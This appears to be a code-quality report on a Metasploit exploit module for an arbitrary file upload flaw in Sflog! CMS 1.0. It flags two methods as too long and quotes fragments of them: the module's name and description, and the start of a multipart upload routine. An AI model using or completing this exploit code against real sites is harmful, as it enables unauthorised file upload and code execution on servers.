modules/exploits/multi/http/sflog_upload_exec.rb
Method initialize
has 39 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info={})
super(update_info(info,
'Name' => "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has
Method upload_exec
has 30 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def upload_exec(cookie, base, php_fname, p)
data = Rex::MIME::Message.new
data.add_part('download', nil, nil, "form-data; name=\"blogID\"")
data.add_part('7', nil, nil, "form-data; name=\"contentType\"")
data.add_part('3000', nil, nil, "form-data; name=\"MAX_FILE_SIZE\"")